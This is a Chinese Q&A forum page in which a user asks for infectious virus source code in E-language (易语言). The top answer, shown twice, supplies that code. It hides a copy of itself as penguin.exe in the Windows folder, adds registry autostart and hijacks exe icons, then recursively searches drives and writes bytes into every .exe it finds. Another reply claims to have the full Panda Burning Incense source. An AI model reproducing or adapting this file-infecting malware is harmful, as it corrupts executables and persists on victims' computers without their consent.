跪求:易语言编写的具有感染性的病毒源代码..
4个回答
展开全部
.版本 2
.支持库 eAPI
提取资源文件图标 (取运行目录 () + “\” + 取执行文件名 (), 0, “C:\windows\system32\Aver.ico”, ) ' 替换系统exe图标
写注册项 (#本地机器, “SOFTWARE\Classes\exefile\DefaultIcon\”, “C:\windows\system32\Aver.ico”) ' 写到注册表键值
写注册项 (#现行用户, “Software\Microsoft\Windows\CurrentVersion\Run\” + 取执行文件名 (), 取运行目录 () + “\” + 取执行文件名 ()) ' 写让注册表键值删除后可恢复木马实行自启动
.如果真 (取运行目录 () ≠ 读环境变量 (“Windir”))
复制文件 (取运行目录 () + “\” + 取执行文件名 (), 读环境变量 (“Windir”) + “\penguin.exe”)
运行 (“Cmd /c Attrib +H +S ” + 读环境变量 (“Windir”) + “\penguin.exe”, 真, 1)
运行 (读环境变量 (“Windir”) + “\penguin.exe”, 假, )
写到文件 (读环境变量 (“Windir”) + “penguin.bat”, 到字节集 (“@echo off” + #换行符 + “Taskkill /f /im ” + 取执行文件名 () + #换行符 + “Del ” + 取当前目录 () + “\” + 取执行文件名 () + #换行符 + “Del %0” + #换行符 + “Exit”))
写到文件 (读环境变量 (“Windir”) + “\penguin.bat”, 到字节集 (子文本替换 (子文本替换 (到文本 (读入文件 (读环境变量 (“Windir”) + “penguin.bat”)), “C:\Documents and Settings”, “C:\DOCUME~1”, , , 假), “Windows”, “ ”, , , 假)))
运行 (读环境变量 (“Windir”) + “\penguin.bat”, 真, 1)
.如果真结束
.如果真 (取运行目录 () = 读环境变量 (“Windir”))
写注册项 (#本地机器, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penguin”, 读环境变量 (“Windir”) + “\penguin.exe”)
写到文件 (读环境变量 (“Windir”) + “Infection.exe”, #感染)
运行 (读环境变量 (“Windir”) + “\Infection.exe”, 真, 1)
.如果真结束
驱动器 = 取驱动器列表 ()
.版本 2
.子程序 搜寻
.参数 目录, 文本型
.局部变量 文件号
.局部变量 文件名, 文本型
处理事件 ()
.如果真 (取文本右边 (目录, 1) ≠ “\”)
目录 = 目录 + “\”
.如果真结束
文件名 = 寻找文件 (目录 + “*.exe”, )
.判断循环首 (文件名 ≠ “”)
输出调试文本 (目录 + 文件名)
文件号 = 打开文件 (删首尾空 (目录 + 文件名), #读写, #无限制)
插入字节集 (文件号, #图标)
关闭文件 (文件号)
文件名 = 寻找文件 (, )
.判断循环尾 ()
文件名 = 寻找文件 (目录 + “*.*”, #子目录)
.判断循环首 (文件名 ≠ “”)
.如果真 (取文本左边 (文件名, 1) ≠ “.”)
搜寻 (目录 + 文件名)
.如果真结束
文件名 = 寻找文件 (, #子目录)
.判断循环尾 ()
原创,不要外传=.=
.支持库 eAPI
提取资源文件图标 (取运行目录 () + “\” + 取执行文件名 (), 0, “C:\windows\system32\Aver.ico”, ) ' 替换系统exe图标
写注册项 (#本地机器, “SOFTWARE\Classes\exefile\DefaultIcon\”, “C:\windows\system32\Aver.ico”) ' 写到注册表键值
写注册项 (#现行用户, “Software\Microsoft\Windows\CurrentVersion\Run\” + 取执行文件名 (), 取运行目录 () + “\” + 取执行文件名 ()) ' 写让注册表键值删除后可恢复木马实行自启动
.如果真 (取运行目录 () ≠ 读环境变量 (“Windir”))
复制文件 (取运行目录 () + “\” + 取执行文件名 (), 读环境变量 (“Windir”) + “\penguin.exe”)
运行 (“Cmd /c Attrib +H +S ” + 读环境变量 (“Windir”) + “\penguin.exe”, 真, 1)
运行 (读环境变量 (“Windir”) + “\penguin.exe”, 假, )
写到文件 (读环境变量 (“Windir”) + “penguin.bat”, 到字节集 (“@echo off” + #换行符 + “Taskkill /f /im ” + 取执行文件名 () + #换行符 + “Del ” + 取当前目录 () + “\” + 取执行文件名 () + #换行符 + “Del %0” + #换行符 + “Exit”))
写到文件 (读环境变量 (“Windir”) + “\penguin.bat”, 到字节集 (子文本替换 (子文本替换 (到文本 (读入文件 (读环境变量 (“Windir”) + “penguin.bat”)), “C:\Documents and Settings”, “C:\DOCUME~1”, , , 假), “Windows”, “ ”, , , 假)))
运行 (读环境变量 (“Windir”) + “\penguin.bat”, 真, 1)
.如果真结束
.如果真 (取运行目录 () = 读环境变量 (“Windir”))
写注册项 (#本地机器, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penguin”, 读环境变量 (“Windir”) + “\penguin.exe”)
写到文件 (读环境变量 (“Windir”) + “Infection.exe”, #感染)
运行 (读环境变量 (“Windir”) + “\Infection.exe”, 真, 1)
.如果真结束
驱动器 = 取驱动器列表 ()
.版本 2
.子程序 搜寻
.参数 目录, 文本型
.局部变量 文件号
.局部变量 文件名, 文本型
处理事件 ()
.如果真 (取文本右边 (目录, 1) ≠ “\”)
目录 = 目录 + “\”
.如果真结束
文件名 = 寻找文件 (目录 + “*.exe”, )
.判断循环首 (文件名 ≠ “”)
输出调试文本 (目录 + 文件名)
文件号 = 打开文件 (删首尾空 (目录 + 文件名), #读写, #无限制)
插入字节集 (文件号, #图标)
关闭文件 (文件号)
文件名 = 寻找文件 (, )
.判断循环尾 ()
文件名 = 寻找文件 (目录 + “*.*”, #子目录)
.判断循环首 (文件名 ≠ “”)
.如果真 (取文本左边 (文件名, 1) ≠ “.”)
搜寻 (目录 + 文件名)
.如果真结束
文件名 = 寻找文件 (, #子目录)
.判断循环尾 ()
原创,不要外传=.=
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
上海国想
2024-12-02 广告
作为上海国想科技发展有限公司的工作人员,遇到mallox勒索病毒,建议立即执行以下步骤:首先,断开网络连接,防止病毒在内网传播,并结束加密程序;其次,备份重要加密文件,以防恢复过程中损坏源文件;然后,联系专业数据恢复机构进行解密;数据恢复后...
点击进入详情页
本回答由上海国想提供
展开全部
为什么要学习C+我有易语言感染全部EXE文件的源码熊猫烧香完整源码我也有
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
可以用delphi,易语言编出来一个空窗口都会被报毒,开发病毒程序能有机会感染吗?
delhpi也很好上手
delhpi也很好上手
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
...学c++吧 易语言感染不了的
本回答被提问者采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
